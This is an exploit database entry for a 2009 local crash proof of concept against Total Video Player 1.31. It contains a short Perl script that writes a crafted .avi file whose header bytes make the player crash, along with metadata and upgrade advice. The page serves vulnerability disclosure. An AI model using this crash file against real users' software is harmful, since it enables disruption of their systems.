header-logo
Suggest Exploit
vendor:
Total Video Player
by:
diving
7,5
CVSS
HIGH
Local Crash
119
CWE
Product Name: Total Video Player
Affected Version From: 1.31
Affected Version To: 1.31
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

Total Video Player 1.31 (.avi) Local Crash PoC

This exploit is for Total Video Player 1.31 (.avi) which is a media player. The exploit is a crafted .avi file which when opened in the vulnerable version of the player, causes a crash. The crafted file contains a header with a specific value which causes the crash.

Mitigation:

Upgrade to the latest version of Total Video Player which is not vulnerable to this exploit.
Source

Exploit-DB raw data:

#!perl

#############################################
# Total Video Player 1.31 (.avi) Local Crash PoC
# by: diving
# Thanks: Indonesian 31337 server diving aka loncat indah :)
# Note: Kalau hanya bisa loncat indah, loncat indah aja. engga usah main kayak ginian
#       main balon sana dodol.
#############################################


my $diving = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";
#############################################
open(fuck, "> diving.avi");
print (fuck $diving);
#############################################

Navigation

Suggest Exploit

Services By CQR